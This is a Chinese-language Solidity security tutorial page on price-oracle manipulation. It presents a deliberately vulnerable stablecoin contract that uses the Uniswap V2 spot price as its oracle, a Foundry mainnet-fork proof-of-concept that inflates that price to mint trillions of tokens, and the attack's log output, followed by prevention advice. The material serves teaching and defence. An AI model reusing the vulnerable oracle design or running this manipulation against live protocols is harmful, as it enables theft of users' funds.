Skip to content

Latest commit

 

History

History

S15_OracleManipulation

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
title tags
S15. 操纵预言机
solidity
security
oracle

WTF Solidity 合约安全: S15. 操纵预言机

我最近在重新学solidity,巩固一下细节,也写一个“WTF Solidity极简入门”,供小白们使用(编程大佬可以另找教程),每周更新1-3讲。

推特:@0xAA_Science@WTFAcademy_

社区:Discord微信群官网 wtf.academy

所有代码和教程开源在github: github.com/AmazingAng/WTFSolidity


这一讲,我们将介绍智能合约的操纵预言机攻击,并复现了一个攻击示例:用1 ETH兑换17万亿枚稳定币。仅2022年一年,操纵预言机攻击造成用户资产损失超过 2 亿美元。

价格预言机

出于安全性的考虑,以太坊虚拟机(EVM)是一个封闭孤立的沙盒。在EVM上运行的智能合约可以接触链上信息,但无法主动和外界沟通获取链下信息。但是,这类信息对去中心化应用非常重要。

预言机(oracle)可以帮助我们解决这个问题,它从链下数据源获得信息,并将其添加到链上,供智能合约使用。

其中最常用的就是价格预言机(price oracle),它可以指代任何可以让你查询币价的数据源。典型用例:

  • 去中心借贷平台(AAVE)使用它来确定借款人是否已达到清算阈值。
  • 合成资产平台(Synthetix)使用它来确定资产最新价格,并支持 0 滑点交易。
  • MakerDAO使用它来确定抵押品的价格,并铸造相应的稳定币 $DAI。

预言机漏洞

如果预言机没有被开发者正确使用,会造成很大的安全隐患。

漏洞例子

下面我们学习一个预言机漏洞的例子,oUSD 合约。该合约是一个稳定币合约,符合ERC20标准。类似合成资产平台Synthetix,用户可以在这个合约中零滑点的将 ETH 兑换为 oUSD(Oracle USD)。兑换价格由自定义的价格预言机(getPrice()函数)决定,这里采取的是Uniswap V2的 WETH-BUSD 的瞬时价格。在之后的攻击示例例子中,我们会看到这个预言机非常容易被操纵。

漏洞合约

oUSD合约包含7个状态变量,用来记录BUSDWETHUniswapV2工厂合约,和WETH-BUSD币对合约的地址。

oUSD合约主要包含3个函数:

  • 构造函数: 初始化 ERC20 代币的名称和代号。
  • getPrice():价格预言机,获取Uniswap V2的 WETH-BUSD 的瞬时价格,这也是漏洞所在。
      // 获取ETH price
      function getPrice() public view returns (uint256 price) {
          // pair 交易对中储备
          (uint112 reserve0, uint112 reserve1, ) = pair.getReserves();
          // ETH 瞬时价格
          price = reserve0/reserve1;
      }
    
  • swap():兑换函数,将 ETH 以预言机给定的价格兑换为 oUSD

合约代码:

contract oUSD is ERC20{
    // 主网合约
    address public constant FACTORY_V2 =
        0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f;
    address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address public constant BUSD = 0x4Fabb145d64652a948d72533023f6E7A623C7C53;

    IUniswapV2Factory public factory = IUniswapV2Factory(FACTORY_V2);
    IUniswapV2Pair public pair = IUniswapV2Pair(factory.getPair(WETH, BUSD));
    IERC20 public weth = IERC20(WETH);
    IERC20 public busd = IERC20(BUSD);

    constructor() ERC20("Oracle USD","oUSD"){}

    // 获取ETH price
    function getPrice() public view returns (uint256 price) {
        // pair 交易对中储备
        (uint112 reserve0, uint112 reserve1, ) = pair.getReserves();
        // ETH 瞬时价格
        price = reserve0/reserve1;
    }

    function swap() external payable returns (uint256 amount){
        // 获取价格
        uint price = getPrice();
        // 计算兑换数量
        amount = price * msg.value;
        // 铸造代币
        _mint(msg.sender, amount);
    }
}

攻击思路

我们针对有漏洞的价格预言机 getPrice() 函数进行攻击,步骤:

  1. 准备一些 BUSD,可以是自有资金,也可以是闪电贷借款。在实现中,我们利用 Foundry 的 deal cheatcode 在本地网络上给自己铸造了 1_000_000 BUSD
  2. 在 UniswapV2 的 WETH-BUSD 池中大量买入 WETH。具体实现见攻击代码的 swapBUSDtoWETH() 函数。
  3. WETH 瞬时价格暴涨,这时我们调用 swap() 函数将 ETH 转换为 oUSD
  4. 可选: 在 UniswapV2 的 WETH-BUSD 池中卖出第2步买入的 WETH,收回本金。

这4步可以在一个交易中完成。

Foundry 复现

我们选用 Foundry 进行操纵预言机攻击的复现,因为它很快,并且可以创建主网的本地分叉,方便测试。如果你不了解 Foundry,可以阅读 WTF Solidity工具篇 T07: Foundry

  1. 在安装好 Foundry 之后,在命令行输入下列命令启动新项目,并安装 openzeppelin 库。
forge init Oracle
cd Oracle
forge install Openzeppelin/openzeppelin-contracts
  1. 在根目录下创建 .env 环境变量文件,并在其中添加主网rpc,用于创建本地测试网。
MAINNET_RPC_URL= https://rpc.ankr.com/eth
  1. 将这一讲的代码,Oracle.solOracle.t.sol,分别复制到根目录的 srctest 文件夹下,然后使用下列命令启动攻击脚本。
forge test -vv --match-test testOracleAttack
  1. 我们可以在终端中看到攻击结果。在攻击前,预言机 getPrice() 给出的 ETH 价格为 1216 USD,是正常的。但在我们使用 1,000,000 BUSD 在 UniswapV2 的 WETH-BUSD 池子中买入 WETH 之后,预言机给出的价格被操纵为 17,979,841,782,699 USD。这时,我们可以轻松的用 1 ETH 兑换17万亿枚 oUSD,完成攻击。
Running 1 test for test/Oracle.t.sol:OracleTest
[PASS] testOracleAttack() (gas: 356524)
Logs:
  1. ETH Price (before attack): 1216
  2. Swap 1,000,000 BUSD to WETH to manipulate the oracle
  3. ETH price (after attack): 17979841782699
  4. Minted 1797984178269 oUSD with 1 ETH (after attack)

Test result: ok. 1 passed; 0 failed; finished in 262.94ms

攻击代码:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;
import "forge-std/Test.sol";
import "forge-std/console.sol";
import "../src/Oracle.sol";

contract OracleTest is Test {
    address private constant alice = address(1);
    address private constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address private constant BUSD = 0x4Fabb145d64652a948d72533023f6E7A623C7C53;
    address private constant ROUTER = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router router;
    IWETH private weth = IWETH(WETH);
    IBUSD private busd = IBUSD(BUSD);
    string MAINNET_RPC_URL;
    oUSD ousd;

    function setUp() public {
        MAINNET_RPC_URL = vm.envString("MAINNET_RPC_URL");
        // fork指定区块
        vm.createSelectFork(MAINNET_RPC_URL,16060405);
        router = IUniswapV2Router(ROUTER);
        ousd = new oUSD();
    }

    //forge test --match-test  testOracleAttack  -vv
    function testOracleAttack() public {
        // 攻击预言机
        // 0. 操纵预言机之前的价格
        uint256 priceBefore = ousd.getPrice();
        console.log("1. ETH Price (before attack): %s", priceBefore); 
        // 给自己账户 1000000 BUSD
        uint busdAmount = 1_000_000 * 10e18;
        deal(BUSD, alice, busdAmount);
        // 2. 用busd买weth,推高顺时价格
        vm.prank(alice);
        busd.transfer(address(this), busdAmount);
        swapBUSDtoWETH(busdAmount, 1);
        console.log("2. Swap 1,000,000 BUSD to WETH to manipulate the oracle");
        // 3. 操纵预言机之后的价格
        uint256 priceAfter = ousd.getPrice();
        console.log("3. ETH price (after attack): %s", priceAfter); 
        // 4. 铸造oUSD
        ousd.swap{value: 1 ether}();
        console.log("4. Minted %s oUSD with 1 ETH (after attack)", ousd.balanceOf(address(this))/10e18); 
    }

    // Swap BUSD to WETH
    function swapBUSDtoWETH(uint amountIn, uint amountOutMin)
        public
        returns (uint amountOut)
    {   
        busd.approve(address(router), amountIn);

        address[] memory path;
        path = new address[](2);
        path[0] = BUSD;
        path[1] = WETH;

        uint[] memory amounts = router.swapExactTokensForTokens(
            amountIn,
            amountOutMin,
            path,
            alice,
            block.timestamp
        );

        // amounts[0] = BUSD amount, amounts[1] = WETH amount
        return amounts[1];
    }
}

预防方法

知名区块链安全专家 samczsun 在一篇博客中总结了预言机操纵的预防方法,这里总结一下:

  1. 不要使用流动性差的池子做价格预言机。
  2. 不要使用现货/瞬时价格做价格预言机,要加入价格延迟,例如时间加权平均价格(TWAP)。
  3. 使用去中心化的预言机。
  4. 使用多个数据源,每次选取最接近价格中位数的几个作为预言机,避免极端情况。
  5. 仔细阅读第三方价格预言机的使用文档及参数设置。

总结

这一讲,我们介绍了操纵预言机攻击,并攻击了一个有漏洞的合成稳定币合约,使用1 ETH兑换了17万亿稳定币,成为了世界首富(并没有)。